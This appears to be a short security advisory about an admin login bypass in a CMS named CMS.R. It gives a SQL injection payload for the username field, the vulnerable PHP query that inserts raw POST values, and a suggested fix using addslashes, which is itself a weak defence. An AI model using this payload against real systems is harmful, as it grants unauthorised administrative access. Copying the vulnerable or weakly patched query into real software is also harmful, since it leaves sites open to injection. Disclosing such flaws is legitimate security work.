Hello Title : CMS.R. the Content Management System admin authentication baypass Discovered by : HACKERS PAL Copyrights : HACKERS PAL Website : WwW.SoQoR.NeT Email : security@soqor.net The Vulnerability works 100% with magic_quotes_gpc = off put the user name value (' or 1=1/*) [code] ' or 1=1/* [/code] and you will login :) error file : index.php line : 48 query :- [code] $query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".$_POST['adminname']."' AND BINARY pass='".$_POST['adminpass']."'"; [/code] solution:- replace [code] $query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".$_POST['adminname']."' AND BINARY pass='".$_POST['adminpass']."'"; [/code] with [code] // // Fixed By : HACKERS PAL // WwW.SoQoR.NeT // $query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".addslashes($_POST['adminname'])."' AND BINARY pass='".addslashes($_POST['adminpass'])."'"; [/code] WwW.SoQoR.NeT